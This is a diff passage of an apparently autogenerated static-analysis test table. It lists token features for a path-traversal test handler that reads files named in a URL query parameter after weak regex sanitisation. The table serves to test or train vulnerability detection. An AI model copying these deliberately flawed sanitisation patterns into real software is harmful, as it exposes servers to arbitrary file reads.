/[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:73 | exceptional return of path.re ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:73 | exceptional return of path.re ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:73 | path.re ... +/, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:73 | path.re ... +/, '') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:73 | path.re ... +/, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:73 | path.re ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:73 | path.re ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:73 | path.re ... +/, '') | stringConcatenatedWith | 'prefix' -endpoint- | +| autogenerated/TaintedPath/TaintedPath.js:194:45:194:51 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:45:194:51 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:45:194:51 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:45:194:51 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:45:194:51 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:194:53:194:68 | /^(\\.\\.[\\/\\\\])+/ | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:194:53:194:68 | /^(\\.\\.[\\/\\\\])+/ | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:194:53:194:68 | /^(\\.\\.[\\/\\\\])+/ | calleeImports | url | @@ -6672,6 +65840,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:194:71:194:72 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:194:71:194:72 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:194:71:194:72 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:86 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:86 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:86 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:86 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:86 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:86 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:86 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:86 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:86 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:3:195:86 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:195:7:195:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:7:195:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:7:195:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:7:195:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:7:195:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:85 | exceptional return of fs.read ... /, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:85 | exceptional return of fs.read ... /, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:85 | exceptional return of fs.read ... /, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:85 | exceptional return of fs.read ... /, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:13:195:85 | exceptional return of fs.read ... /, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:195:13:195:85 | fs.read ... /, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:195:13:195:85 | fs.read ... /, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:195:13:195:85 | fs.read ... /, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6680,6 +65888,41 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:195:13:195:85 | fs.read ... /, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:195:13:195:85 | fs.read ... /, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:195:13:195:85 | fs.read ... /, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:195:16:195:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:16:195:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:16:195:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:16:195:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:16:195:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:38 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:38 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:38 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:38 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:38 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:48 | pathModule.normalize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:48 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:48 | pathModule.normalize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:48 | pathModule.normalize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:48 | pathModule.normalize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:54 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:54 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:54 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:54 | exceptional return of pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:54 | exceptional return of pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:54 | pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:54 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:54 | pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:54 | pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:54 | pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:62 | pathMod ... replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:62 | pathMod ... replace | contextSurroundingFunctionParameters | 